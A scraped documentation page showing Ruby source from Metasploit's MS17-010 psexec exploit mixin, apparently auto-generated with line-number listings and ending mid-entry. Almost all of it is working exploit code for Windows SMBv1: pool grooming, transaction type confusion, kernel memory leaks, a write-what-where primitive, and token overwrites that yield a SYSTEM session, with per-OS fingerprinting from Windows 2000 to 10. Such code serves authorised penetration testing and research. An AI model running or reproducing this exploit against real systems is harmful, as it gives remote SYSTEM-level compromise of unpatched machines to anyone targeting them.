raw << [data.length].pack("v") raw << [data.length].pack("v") raw << data
raw = raw[4..-1]
nbss = [raw.length].pack("N")
raw = nbss + raw
self.simple.client.smb_send(raw)
self.simple.client.smb_recv()
end
|
#do_write_andx_raw_pipe(fid: 0, data: '', tid: nil, uid: nil, pid: nil, mid: nil) ⇒ Object
1047
1048
1049
1050
1051
1052
1053
1054
1055
1056
1057
1058
1059
1060
1061
1062
1063
1064
1065
1066
1067
1068
1069
1070
1071
1072
1073
1074
1075
1076
1077
1078
1079
1080
1081
1082
1083
|
# File 'lib/msf/core/exploit/remote/smb/client/psexec_ms17_010.rb', line 1047
def do_write_andx_raw_pipe(fid: 0, data: '', tid: nil, uid: nil, pid: nil, mid: nil)
pkt = CONST::SMB_WRITE_PKT.make_struct
(pkt, tid: tid, uid: uid, pid: pid, mid: mid)
pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_WRITE_ANDX
pkt['Payload']['SMB'].v['WordCount'] = 12
base_offset = 24
pkt['Payload'].v['AndX'] = 0xff
pkt['Payload'].v['FileID'] = fid
pkt['Payload'].v['Offset'] = 0
pkt['Payload'].v['WriteMode'] = 4 pkt['Payload'].v['Remaining'] = 1000 + Random.rand(10000) pkt['Payload'].v['DataLenHigh'] = 0
pkt['Payload'].v['DataLenLow'] = data.length
pkt['Payload'].v['DataOffset'] = 32 + 1 + base_offset + 2 + 1
raw = pkt.to_s[0..-7]
raw << [data.length + 1].pack("v") raw << "\x00" raw << data
raw = raw[4..-1]
nbss = [raw.length].pack("N")
raw = nbss + raw
self.simple.client.smb_send(raw)
return self.simple.client.smb_recv()
end
|
#eternal_cleanup ⇒ Object
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
|
# File 'lib/msf/core/exploit/remote/smb/client/psexec_ms17_010.rb', line 64
def eternal_cleanup()
begin
if @ctx['rekt']
if @ctx.key? 'PCTXTHANDLE_TOKEN_OFFSET'
userAndGroupsOffset = @ctx['userAndGroupsAddr'] - @ctx['tokenAddr']
write_what_where(@ctx['tokenData'][userAndGroupsOffset..userAndGroupsOffset+@ctx['fakeUserAndGroups'].length-1], @ctx['userAndGroupsAddr'])
if @ctx['fakeUserAndGroupCount'] != @ctx['userAndGroupCount']
write_what_where([@ctx['userAndGroupCount']].pack("V"), @ctx['tokenAddr']+@ctx['TOKEN_USER_GROUP_CNT_OFFSET'])
end
else
write_what_where(@ctx['secCtxData'], @ctx['secCtxAddr'])
end
vprint_good("SYSTEM session cleaned up.")
end
disconnect rescue ::Rex::Proto::SMB::Exceptions::NoReply => e
rescue => error
vprint_error(error.class.to_s)
vprint_error(error.message)
vprint_error(error.backtrace.join("\n"))
end
end
|
#eternal_pwn(ip) ⇒ Object
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
|
# File 'lib/msf/core/exploit/remote/smb/client/psexec_ms17_010.rb', line 24
def eternal_pwn(ip)
@ctx = {}
@ctx['rekt'] = false @ctx['ip'] = ip
connect(versions: [1])
self.simple.client.default_max_buffer_size = 4356 self.simple.client.socket.setsockopt(::Socket::SOL_SOCKET, ::Socket::SO_KEEPALIVE, 1)
self.simple.client.socket.setsockopt(::Socket::IPPROTO_TCP, ::Socket::TCP_NODELAY, 1)
smb_login()
fingerprint_os(simple.client.peer_native_os)
pipe_handle = find_accessible_named_pipe()
if @ctx['go_fish']
exploit_fish_barrel(pipe_handle)
else
exploit_matched_pairs(pipe_handle)
end
print_status("Built a write-what-where primitive...")
fmt = @ctx['PTR_FMT']
poffset = @ctx['session'] + @ctx['SESSION_ISNULL_OFFSET']
write_what_where("\x00\x01", poffset)
vprint_status("Overwrote IsNullSession = 0, IsAdmin = 1 at 0x#{poffset.to_s(16)}")
modify_token()
@ctx['rekt'] = true
print_good("Overwrite complete... SYSTEM session obtained!")
end
|
#exploit_fish_barrel(pipe_handle) ⇒ Object
588
589
590
591
592
593
594
595
596
597
598
599
600
601
602
603
604
605
606
607
608
609
610
611
612
613
614
615
616
617
618
619
620
621
622
623
624
625
626
627
628
629
630
631
632
633
634
635
636
637
638
639
640
641
642
643
644
645
646
647
648
649
650
651
652
653
654
655
656
657
658
659
660
661
662
663
664
665
666
667
668
669
670
671
672
673
674
675
676
677
678
679
680
681
682
683
684
685
686
687
688
689
690
691
692
693
694
695
696
697
698
699
700
701
702
703
704
705
706
707
708
709
710
711
712
713
714
715
716
717
718
719
720
721
722
723
724
725
726
727
728
729
730
731
732
733
734
735
736
737
738
739
740
741
742
743
744
745
746
747
748
749
750
751
752
753
754
755
756
757
758
759
760
761
762
763
764
765
766
767
768
769
770
771
772
773
774
775
776
777
778
779
780
781
782
783
784
785
786
787
788
789
790
791
792
793
794
795
796
797
798
799
800
801
802
803
804
805
806
807
808
809
810
811
|
# File 'lib/msf/core/exploit/remote/smb/client/psexec_ms17_010.rb', line 588
def exploit_fish_barrel(pipe_handle)
@ctx['fid'] = pipe_handle.file_id
xTRANS_NAME_LEN = 4
xHEAP_HDR_SIZE = 8
if @ctx['os'] == 'WIN7' and !(@ctx.key? 'arch')
begin
leak_frag_size(pipe_handle.file_id)
rescue Timeout::Error
raise MS17_010_Error, 'Timeout::Error leaking initial Frag size, is the target patched?'
end
end
attempt_list = []
if @ctx.key? 'arch'
pick_ctx()
attempt_list.push(OS_ARCH_INFO[@ctx['os']][@ctx['arch']])
else
attempt_list.push(OS_ARCH_INFO[@ctx['os']]['x64'])
attempt_list.push(OS_ARCH_INFO[@ctx['os']]['x86'])
end
trans_param = [@ctx['fid']].pack("V") for i in 0..11
mid = if i == 8 then @ctx['fid'] else () end
pkt = create_trans_packet(mid: mid, param: trans_param, totalParameterCount:0x100-TRANS_NAME_LEN,
totalDataCount: 0xec0, maxParameterCount: 0x40, maxDataCount: 0)
smb_send_recv_raw(pkt.to_s)
end
print_status("Filling barrel with fish... done")
print_status("<---------------- | Entering Danger Zone | ---------------->")
print_status("\t[*] Preparing dynamite...")
shift_indata_byte = 0x200
do_write_andx_raw_pipe(fid: pipe_handle.file_id, data: Rex::Text.rand_text_alpha(shift_indata_byte))
success = false
stick = 1
for xinfo in attempt_list
tinfo = {}
tinfo = tinfo.merge(xinfo['CPUARCH'])
tinfo = tinfo.merge(xinfo['OFFSETS'])
tinfo = tinfo.merge(xinfo['SESSION'])
vprint_status("Attempt controlling next transaction on #{tinfo['ARCH']}")
xHEAP_CHUNK_PAD_SIZE = (tinfo['POOL_ALIGN'] - (tinfo['TRANS_SIZE']+xHEAP_HDR_SIZE) % tinfo['POOL_ALIGN']) % tinfo['POOL_ALIGN']
xNEXT_TRANS_OFFSET = 0xf00 - shift_indata_byte + xHEAP_CHUNK_PAD_SIZE + xHEAP_HDR_SIZE
pkt = create_trans_secondary_packet(mid: @ctx['fid'], data: "\x00", dataDisplacement: xNEXT_TRANS_OFFSET+tinfo['TRANS_MID_OFFSET'])
self.simple.client.smb_send(pkt.to_s)
do_smb_echo()
pkt = create_nt_trans_packet(5, mid: @@special_mid, param: trans_param, data: '')
recvPkt = smb_send_recv_raw(pkt.to_s)
errno = recvPkt['Payload']['SMB'].v['ErrorClass']
if errno == 0x10002 success = true
print_status("\t\t[*] Trying stick #{stick.to_s} (#{tinfo['ARCH']})...Boom!")
if !(@ctx.key? 'arch')
@ctx['arch'] = tinfo['ARCH']
pick_ctx()
end
break
end
print_status("\t\tTrying stick #{stick.to_s} (#{tinfo['ARCH']})...Miss")
stick += 1
if errno != 0
vprint_status("Unexpected return status: 0x{errno.to_s(16)}")
end
end
if not success
print_status("<---------------- | Leaving Danger Zone | ---------------->")
raise MS17_010_Error, "Unable to control groom transaction"
end
pkt = create_trans_secondary_packet(mid: @ctx['fid'], data: "\xff"*4, dataDisplacement: xNEXT_TRANS_OFFSET+@ctx['TRANS_TOTALPARAMCNT_OFFSET'])
self.simple.client.smb_send(pkt.to_s)
if @ctx['arch'] == 'x64'
pkt = create_trans_secondary_packet(mid: @ctx['fid'], data: "\xff"*4, dataDisplacement: xNEXT_TRANS_OFFSET+@ctx['TRANS_INPARAM_OFFSET']+4)
self.simple.client.smb_send(pkt.to_s)
end
do_smb_echo()
xTRANS_CHUNK_SIZE = xHEAP_HDR_SIZE + @ctx['TRANS_SIZE'] + 0x1000 + xHEAP_CHUNK_PAD_SIZE
xPREV_TRANS_DISPLACEMENT = xTRANS_CHUNK_SIZE + @ctx['TRANS_SIZE'] + xTRANS_NAME_LEN
xPREV_TRANS_OFFSET = 0x100000000 - xPREV_TRANS_DISPLACEMENT
pkt = create_nt_trans_secondary_packet(mid: @@special_mid, param: "\xff"*4, paramDisplacement: xPREV_TRANS_OFFSET+@ctx['TRANS_TOTALPARAMCNT_OFFSET'])
self.simple.client.smb_send(pkt.to_s)
if @ctx['arch'] == 'x64'
pkt = create_nt_trans_secondary_packet(mid: @@special_mid, param: "\xff"*4, paramDisplacement: xPREV_TRANS_OFFSET+@ctx['TRANS_INPARAM_OFFSET']+4)
self.simple.client.smb_send(pkt.to_s)
pkt = create_trans_secondary_packet(mid: @ctx['fid'], data: "\x00"*4, dataDisplacement: xNEXT_TRANS_OFFSET+@ctx['TRANS_INPARAM_OFFSET']+4)
self.simple.client.smb_send(pkt.to_s)
end
do_smb_echo()
pkt = create_trans_secondary_packet(mid: @ctx['fid'], data: "\x05", dataDisplacement: xNEXT_TRANS_OFFSET+@ctx['TRANS_FUNCTION_OFFSET'])
self.simple.client.smb_send(pkt.to_s)
data = [4, 4, 4, 0x100, 0x100].pack("VVVVV") pkt = create_trans_secondary_packet(mid: @ctx['fid'], data: data, dataDisplacement: xNEXT_TRANS_OFFSET+@ctx['TRANS_PARAMCNT_OFFSET'])
self.simple.client.smb_send(pkt.to_s)
pkt = create_nt_trans_secondary_packet(mid: @@special_mid)
self.simple.client.smb_send(pkt.to_s)
leakData = recv_transaction_data(@@special_mid, 0x100)
leakData = leakData[4..-1]
chunk = leakData[xHEAP_CHUNK_PAD_SIZE..-1].unpack("v")[0]
leakTranOffset = xHEAP_CHUNK_PAD_SIZE + xHEAP_HDR_SIZE
leakTrans = leakData[leakTranOffset..-1]
fmt = @ctx['PTR_FMT']
_, connection_addr, session_addr, treeconnect_addr, flink_value = leakTrans[8..-1].unpack(fmt * 5) inparam_value, outparam_value, indata_value = leakTrans[@ctx['TRANS_INPARAM_OFFSET']..-1].unpack(fmt * 3) trans2_mid = leakTrans[@ctx['TRANS_MID_OFFSET']..-1].unpack("v")[0]
print_status("\t[+] Successfully Leaked Transaction!")
print_status("\t[+] Successfully caught Fish-in-a-barrel")
print_status("<---------------- | Leaving Danger Zone | ---------------->")
print_status("Reading from CONNECTION struct at: 0x#{connection_addr.to_s(16)}")
trans2_addr = inparam_value - @ctx['TRANS_SIZE'] - xTRANS_NAME_LEN
trans1_addr = trans2_addr - xTRANS_CHUNK_SIZE * 2
if datastore['DBGTRACE']
print_status("CONNECTION: 0x#{connection_addr.to_s(16)}")
print_status("SESSION: 0x#{session_addr.to_s(16)}")
print_status("FLINK: 0x#{flink_value.to_s(16)}")
print_status("InData: 0x#{indata_value.to_s(16)}")
print_status("MID: 0x#{trans2_mid.to_s(16)}")
print_status("TRANS1: 0x#{trans1_addr.to_s(16)}")
print_status("TRANS2: 0x#{trans2_addr.to_s(16)}")
end
xTRANS_OFFSET = 0x100000000 - (@ctx['TRANS_SIZE'] + xTRANS_NAME_LEN)
param = [trans1_addr, trans1_addr+0x200, trans2_addr].pack(fmt * 3) pkt = create_nt_trans_secondary_packet(mid: @ctx['fid'], param: param, paramDisplacement: xTRANS_OFFSET+@ctx['TRANS_INPARAM_OFFSET'])
self.simple.client.smb_send(pkt.to_s)
do_smb_echo()
trans1_mid = next_multiplex_id()
param = [trans1_mid].pack("v") pkt = create_trans_secondary_packet(mid: @ctx['fid'], param: param, paramDisplacement: @ctx['TRANS_MID_OFFSET'])
self.simple.client.smb_send(pkt.to_s)
do_smb_echo()
@ctx['connection'] = connection_addr
@ctx['session'] = session_addr
@ctx['trans1_mid'] = trans1_mid
@ctx['trans1_addr'] = trans1_addr
@ctx['trans2_mid'] = trans2_mid
@ctx['trans2_addr'] = trans2_addr
end
|
#exploit_matched_pairs(pipe_handle) ⇒ Object
todo: spice it up with EternalSynergy output
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
|
# File 'lib/msf/core/exploit/remote/smb/client/psexec_ms17_010.rb', line 349
def exploit_matched_pairs(pipe_handle)
begin
leak_frag_size(pipe_handle.file_id)
rescue TypeError => e
raise MS17_010_Error, 'TypeError leaking initial Frag size, is the target patched?'
end
pick_ctx()
@ctx['GROOM_POOL_SIZE'] = calc_alloc_size(GROOM_TRANS_SIZE + @ctx['SRV_BUFHDR_SIZE'] + @ctx['POOL_ALIGN'], @ctx['POOL_ALIGN'])
@ctx['GROOM_DATA_SIZE'] = GROOM_TRANS_SIZE - TRANS_NAME_LEN - 4 - @ctx['TRANS_SIZE']
bridePoolSize = 0x1000 - (@ctx['GROOM_POOL_SIZE'] & 0xfff) - @ctx['FRAG_POOL_SIZE']
@ctx['BRIDE_TRANS_SIZE'] = bridePoolSize - (@ctx['SRV_BUFHDR_SIZE'] + @ctx['POOL_ALIGN'])
if datastore['DBGTRACE']
print_status("GROOM_POOL_SIZE: 0x#{@ctx['GROOM_POOL_SIZE'].to_s(16)}")
print_status("BRIDE_TRANS_SIZE: 0x#{@ctx['BRIDE_TRANS_SIZE'].to_s(16)}")
end
@ctx['BRIDE_DATA_SIZE'] = @ctx['BRIDE_TRANS_SIZE'] - TRANS_NAME_LEN - @ctx['TRANS_SIZE']
for i in 0..datastore['LEAKATTEMPTS']
()
vprint_status("Attempting leak ##{i.to_s}")
leakInfo = align_transaction_and_leak(pipe_handle)
if leakInfo != nil
break
end
vprint_status("Align transaction and leak failed, attempt ##{i.to_s}")
if i == datastore['LEAKATTEMPTS'] - 1
raise MS17_010_Error, "Abort after using up all LEAKATTEMPTS."
end
pipe_handle.close()
self.simple.client.tree_disconnect()
self.simple.client.tree_connect("\\\\#{@ctx['ip']}\\IPC$")
pipe_handle = self.simple.create_pipe(@ctx['pipe_name'], 'o')
end
@ctx['fid'] = pipe_handle.file_id
@ctx['pipe_handle'] = pipe_handle
@ctx = @ctx.merge(leakInfo)
vprint_status("Leaked connection struct (0x#{@ctx['connection'].to_s(16)}), performing WriteAndX type confusion")
shift_indata_byte = 0x200
do_write_andx_raw_pipe(fid:pipe_handle.file_id, data: Rex::Text.rand_text_alpha(shift_indata_byte))
indata_value = @ctx['next_page_addr'] + @ctx['TRANS_SIZE'] + 8 + @ctx['SRV_BUFHDR_SIZE'] + 0x1000 + shift_indata_byte
indata_next_trans_displacement = @ctx['trans2_addr'] - indata_value
delta = indata_next_trans_displacement + @ctx['TRANS_MID_OFFSET']
pkt = create_nt_trans_secondary_packet(mid: pipe_handle.file_id, data: "\x00",
dataDisplacement: delta)
self.simple.client.smb_send(pkt.to_s)
do_smb_echo()
pkt = create_nt_trans_packet(5, mid: @@special_mid, param: [pipe_handle.file_id].pack("V"), data: '')
recvPkt = smb_send_recv_raw(pkt.to_s)
errno = recvPkt['Payload']['SMB'].v['ErrorClass']
if errno != 0x10002 raise MS17_010_Error, "Unexpected return status during overwrite: 0x#{errno.to_s(16)}"
end
vprint_status("Control of groom transaction")
fmt = @ctx['PTR_FMT']
pkt = create_nt_trans_secondary_packet(mid: pipe_handle.file_id, data: [@ctx['trans1_addr']].pack(fmt),
dataDisplacement: indata_next_trans_displacement + @ctx['TRANS_INDATA_OFFSET'])
self.simple.client.smb_send(pkt.to_s)
do_smb_echo()
pkt = create_nt_trans_secondary_packet(mid: @@special_mid,
data: [@ctx['trans1_addr'], @ctx['trans1_addr']+0x200, @ctx['trans2_addr']].pack(fmt * 3),
dataDisplacement: @ctx['TRANS_INPARAM_OFFSET'])
self.simple.client.smb_send(pkt.to_s)
do_smb_echo()
@ctx['trans2_mid'] = next_multiplex_id()
pkt = create_nt_trans_secondary_packet(mid: @ctx['trans1_mid'],
data: [@ctx['trans2_mid']].pack('v'),
dataDisplacement: @ctx['TRANS_MID_OFFSET'])
self.simple.client.smb_send(pkt.to_s)
end
|
#find_accessible_named_pipe ⇒ Object
335
336
337
338
339
340
341
342
343
344
345
346
|
# File 'lib/msf/core/exploit/remote/smb/client/psexec_ms17_010.rb', line 335
def find_accessible_named_pipe
@ctx['pipe_name'], pipe_handle = check_named_pipes(
check_first: datastore['NAMEDPIPE'],
return_first: true
)
if @ctx['pipe_name'] && pipe_handle
pipe_handle
else
raise MS17_010_Error, 'Unable to find accessible named pipe!'
end
end
|
#fingerprint_os(os) ⇒ Object
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
|
# File 'lib/msf/core/exploit/remote/smb/client/psexec_ms17_010.rb', line 300
def fingerprint_os(os)
print_status("Target OS: #{os}")
if os.starts_with? 'Windows 10' or os.starts_with? 'Windows Server 2016' or os.starts_with? 'Windows 8' or os.starts_with? 'Windows Server 2012' or os.starts_with? 'Windows RT 9200'
@ctx['os'] = 'WIN8'
@ctx['go_fish'] = false
elsif os.starts_with? 'Windows 7 ' or os.starts_with? 'Windows Server 2008 R2' or os.starts_with? 'Windows Storage Server 2008 R2' or os.starts_with? 'Windows Embedded Standard 7'
@ctx['os'] = 'WIN7'
@ctx['go_fish'] = false
elsif os.starts_with? "Windows Server (R) 2008" or os.starts_with? 'Windows Vista'
@ctx['os'] = 'WIN7'
@ctx['go_fish'] = true
elsif os.starts_with? "Windows Server 2003 "
@ctx['os'] = 'WIN2K3'
@ctx['go_fish'] = true
elsif os.starts_with? "Windows 5.1"
@ctx['os'] = 'WINXP'
@ctx['arch'] = 'x86'
@ctx['go_fish'] = true
pick_ctx()
elsif os.starts_with? "Windows XP "
@ctx['os'] = 'WINXP'
@ctx['arch'] = 'x64'
@ctx['go_fish'] = true
pick_ctx()
elsif os.starts_with? "Windows 5.0"
@ctx['os'] = 'WIN2K'
@ctx['arch'] = 'x86'
@ctx['go_fish'] = true
pick_ctx()
else
raise MS17_010_Error, 'Exploit unavailable for target OS.'
end
end
|
#get_group_data_from_token(tokenData) ⇒ Object
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
|
# File 'lib/msf/core/exploit/remote/smb/client/psexec_ms17_010.rb', line 208
def get_group_data_from_token(tokenData)
success, userAndGroupCount, userAndGroupsAddr = validate_token_offset(tokenData, @ctx['TOKEN_USER_GROUP_CNT_OFFSET'], @ctx['TOKEN_USER_GROUP_ADDR_OFFSET'])
if not success and @ctx['os'] == 'WINXP' and @ctx['arch'] == 'x86'
print_status('Attempting WINXP SP0/SP1 x86 TOKEN_USER_GROUP workaround')
@ctx['TOKEN_USER_GROUP_CNT_OFFSET'] = @ctx['TOKEN_USER_GROUP_CNT_OFFSET_SP0_SP1']
@ctx['TOKEN_USER_GROUP_ADDR_OFFSET'] = @ctx['TOKEN_USER_GROUP_ADDR_OFFSET_SP0_SP1']
success, userAndGroupCount, userAndGroupsAddr = validate_token_offset(tokenData, @ctx['TOKEN_USER_GROUP_CNT_OFFSET'], @ctx['TOKEN_USER_GROUP_ADDR_OFFSET'])
end
if not success
raise MS17_010_Error, 'Bad TOKEN_USER_GROUP offsets. Abort > BSOD'
end
return userAndGroupsAddr, userAndGroupCount
end
|
#initialize(info = {}) ⇒ Object
10
11
12
13
14
15
16
17
18
|
# File 'lib/msf/core/exploit/remote/smb/client/psexec_ms17_010.rb', line 10
def initialize(info = {})
super
register_options([
OptString.new('NAMEDPIPE', [false, 'A named pipe that can be connected to (leave blank for auto)', '']),
OptInt.new('LEAKATTEMPTS', [true, 'How many times to try to leak transaction', 99]), OptPort.new('RPORT', [true, 'The Target port', 445]),
OptBool.new('DBGTRACE', [ true, "Show extra debug trace info", false ]),
])
end
|
#leak_frag_size(fid) ⇒ Object
850
851
852
853
854
855
856
857
858
859
860
861
862
863
864
865
866
867
868
869
870
871
872
873
874
875
876
877
878
879
880
|
# File 'lib/msf/core/exploit/remote/smb/client/psexec_ms17_010.rb', line 850
def leak_frag_size(fid)
mid = next_multiplex_id()
op = ::Rex::Proto::SMB::Constants::NT_TRANSACT_RENAME
r1pkt = create_nt_trans_packet(op, param: [fid].pack("V"), mid: mid, data: Rex::Text.rand_text_alpha(0x10d0), maxParameterCount: GROOM_TRANS_SIZE - 0x10d0 - TRANS_NAME_LEN)
r2pkt = create_nt_trans_secondary_packet(mid: mid, data: Rex::Text.rand_text_alpha(276))
r1bin = r1pkt.to_s[0..-9]
r2bin = r1pkt.to_s[-8..-1] + r2pkt.to_s
self.simple.client.smb_send(r1bin)
self.simple.client.smb_send(r2bin)
data = recv_transaction_data(mid, 0x10d0 + 276)
data = data[0x10d4..-1]
if data[X64_FRAG_TAG_OFFSET..-1].starts_with? 'Frag'
@ctx['arch'] = 'x64'
@ctx['FRAG_POOL_SIZE'] = data[X64_FRAG_TAG_OFFSET - 2].ord * X64_POOL_ALIGN
elsif data[X86_FRAG_TAG_OFFSET..-1].starts_with? 'Frag'
@ctx['arch'] = 'x86'
@ctx['FRAG_POOL_SIZE'] = data[X86_FRAG_TAG_OFFSET - 2].ord * X86_POOL_ALIGN
else
raise MS17_010_Error, "Unable to parse Frag leak data!"
end
vprint_status("Frag pool info leak: arch=#{@ctx['arch']}, size=0x#{@ctx['FRAG_POOL_SIZE'].to_s(16)}")
end
|
#modify_token ⇒ Object
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
|
# File 'lib/msf/core/exploit/remote/smb/client/psexec_ms17_010.rb', line 91
def modify_token()
fmt = @ctx['PTR_FMT']
sessionData = read_data(@ctx['session'], 0x100)
secCtxAddr = sessionData[@ctx['SESSION_SECCTX_OFFSET']..-1].unpack(@ctx['PTR_FMT'])[0]
if datastore['DBGTRACE']
print_status("Session Data: #{bin_to_hex(sessionData)}")
print_status("session dat len = #{sessionData.length}")
print_status("Session ctx offset = #{@ctx['SESSION_SECCTX_OFFSET'].to_s(16)}")
print_status("Session ctx data = #{bin_to_hex(sessionData[@ctx['SESSION_SECCTX_OFFSET']..-1])}")
print_status("secCtxAddr: #{secCtxAddr.to_s(16)}")
end
if @ctx.key? 'PCTXTHANDLE_TOKEN_OFFSET'
if @ctx.key? 'SECCTX_PCTXTHANDLE_OFFSET'
pctxtDataInfo = read_data(secCtxAddr+@ctx['SECCTX_PCTXTHANDLE_OFFSET'], 8)
pctxtDataAddr = pctxtDataInfo.unpack(fmt)[0] else
pctxtDataAddr = secCtxAddr
end
tokenAddrInfo = read_data(pctxtDataAddr+@ctx['PCTXTHANDLE_TOKEN_OFFSET'], 8)
tokenAddr = tokenAddrInfo.unpack(fmt)[0] vprint_status("Found TOKEN addr: 0x#{tokenAddr}")
tokenData = read_data(tokenAddr, 0x40*@ctx['PTR_SIZE'])
@ctx['tokenData'] = tokenData
@ctx['tokenAddr'] = tokenAddr
if datastore['DBGTRACE']
print_status("TOKEN data = #{bin_to_hex(tokenData)}")
end
userAndGroupsAddr, userAndGroupCount = get_group_data_from_token(tokenData)
vprint_status("Overwriting _TOKEN UserAndGroups (#{userAndGroupsAddr.to_s(16)})...")
fakeUserAndGroupCount, fakeUserAndGroups = create_fake_SYSTEM_UserAndGroups(userAndGroupCount, userAndGroupsAddr)
if fakeUserAndGroupCount != userAndGroupCount
write_what_where([fakeUserAndGroupCount].pack("V"), tokenAddr+@ctx['TOKEN_USER_GROUP_CNT_OFFSET'])
end
write_what_where(fakeUserAndGroups, userAndGroupsAddr)
@ctx['userAndGroupsAddr'] = userAndGroupsAddr
@ctx['fakeUserAndGroups'] = fakeUserAndGroups
@ctx['fakeUserAndGroupCount'] = fakeUserAndGroupCount
@ctx['userAndGroupCount'] = userAndGroupCount
else
if datastore['DBGTRACE']
print_status("Reading secCtxData from #{secCtxAddr.to_s(16)}")
end
secCtxData = read_data(secCtxAddr, @ctx['SECCTX_SIZE'])
if datastore['DBGTRACE']
print_status("Read data from secCtx: #{bin_to_hex(secCtxData)}")
end
@ctx['secCtxData'] = secCtxData
@ctx['secCtxAddr'] = secCtxAddr
write_what_where(@ctx['FAKE_SECCTX'], secCtxAddr)
vprint_status("Overwrote token SID security context with fake context")
end
end
|
1162
1163
1164
1165
|
# File 'lib/msf/core/exploit/remote/smb/client/psexec_ms17_010.rb', line 1162
def ()
@@extra_last_mid += 1
return @@extra_last_mid
end
|
#next_multiplex_id ⇒ Object
1145
1146
1147
1148
1149
1150
1151
1152
|
# File 'lib/msf/core/exploit/remote/smb/client/psexec_ms17_010.rb', line 1145
def next_multiplex_id
@@last_multiplex_id += 1 + Random.rand(21)
if 0x4000 <= @@last_multiplex_id && @@last_multiplex_id <= 0x4110
@@last_multiplex_id += 0x120
end
return @@last_multiplex_id
end
|
#pick_ctx ⇒ Object
1371
1372
1373
1374
1375
1376
1377
|
# File 'lib/msf/core/exploit/remote/smb/client/psexec_ms17_010.rb', line 1371
def pick_ctx()
pick = OS_ARCH_INFO[@ctx['os']][@ctx['arch']]
@ctx = @ctx.merge(pick['CPUARCH'])
@ctx = @ctx.merge(pick['OFFSETS'])
@ctx = @ctx.merge(pick['SESSION'])
@ctx
end
|
#put_trans_data(pkt, len: 0, param: '', data: '', noPad: false) ⇒ Object
Note: Setup length is included when len(param) is called
978
979
980
981
982
983
984
985
986
987
988
989
990
991
992
993
994
995
996
997
998
999
1000
1001
1002
1003
1004
1005
1006
1007
|
# File 'lib/msf/core/exploit/remote/smb/client/psexec_ms17_010.rb', line 978
def put_trans_data(pkt, len: 0, param: '', data: '', noPad: false)
pkt['Payload'].v['ParamOffset'] = 0
pkt['Payload'].v['DataOffset'] = 0
len = pkt.to_s.length - 4
param = param.b
data = data.b
offset = len
transData = ''
if param != ''
padLen = if noPad then 0 else (4 - offset % 4 ) % 4 end
pkt['Payload'].v['ParamOffset'] = offset + padLen
transData = ("\x00" * padLen) + param
offset += padLen + param.length
end
if data != ''
padLen = if noPad then 0 else (4 - offset % 4 ) % 4 end
pkt['Payload'].v['DataOffset'] = offset + padLen
transData += ("\x00" * padLen) + data
end
pkt['Payload'].v['Payload'] = transData
pkt
end
|
#read_data(read_addr, read_size) ⇒ Object
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
|
# File 'lib/msf/core/exploit/remote/smb/client/psexec_ms17_010.rb', line 254
def read_data(read_addr, read_size)
if read_addr == 0
raise MS17_010_Error, 'Attempted to read from a NULL pointer!'
end
fmt = @ctx['PTR_FMT']
new_data = [@ctx['trans2_addr']+@ctx['TRANS_FLINK_OFFSET'], @ctx['trans2_addr']+0x200, read_addr].pack(fmt * 3) new_data << [0, 0].pack("VV") new_data << [8, 8, 8].pack("VVV") new_data << [read_size, read_size, read_size].pack("VVV") new_data << [0, 5].pack("vv") pkt = create_nt_trans_secondary_packet(mid: @ctx['trans1_mid'], data: new_data, dataDisplacement: @ctx['TRANS_OUTPARAM_OFFSET'])
self.simple.client.smb_send(pkt.to_s)
pkt = create_nt_trans_packet(5, param: [@ctx['fid']].pack("V"), totalDataCount: 0x4300-0x20, totalParameterCount: 0x1000)
self.simple.client.smb_send(pkt.to_s)
pkt = create_nt_trans_secondary_packet(mid: @ctx['trans2_mid'])
self.simple.client.smb_send(pkt.to_s)
read_data = recv_transaction_data(@ctx['trans2_mid'], 8 + read_size)
@ctx['trans2_addr'] = read_data.unpack(fmt)[0] - @ctx['TRANS_FLINK_OFFSET']
pkt = create_nt_trans_secondary_packet(mid: @ctx['trans1_mid'], param: [@ctx['trans2_addr']].pack(fmt), paramDisplacement: @ctx['TRANS_INDATA_OFFSET'])
self.simple.client.smb_send(pkt.to_s)
do_smb_echo()
pkt = create_nt_trans_secondary_packet(mid: @ctx['trans1_mid'], data: [@ctx['trans2_mid']].pack("v"), dataDisplacement: @ctx['TRANS_MID_OFFSET'])
self.simple.client.smb_send(pkt.to_s)
do_smb_echo()
return read_data[8..-1] end
|
#recv_transaction_data(mid, len) ⇒ Object
886
887
888
889
890
891
892
893
894
895
896
897
898
899
900
|
# File 'lib/msf/core/exploit/remote/smb/client/psexec_ms17_010.rb', line 886
def recv_transaction_data(mid, len)
data = ''
while data.length < len
raw = self.simple.client.smb_recv
pkt = CONST::SMB_NTTRANS_RES_PKT.make_struct
pkt.from_s(raw)
if pkt['Payload']['SMB'].v['MultiplexID'].to_s == mid.to_s
data += pkt['Payload'].v['Payload'][1..-1]
end
end
return data
end
|
1157
1158
1159
1160
|
# File 'lib/msf/core/exploit/remote/smb/client/psexec_ms17_010.rb', line 1157
def ()
@@special_mid = (next_multiplex_id() & 0xff00) - 0x100
@@extra_last_mid = @@special_mid
end
|
Sets common SMB1 Header values used by the various packets in the exploit.
1115
1116
1117
1118
1119
1120
1121
1122
1123
1124
1125
1126
1127
1128
1129
1130
1131
1132
1133
1134
1135
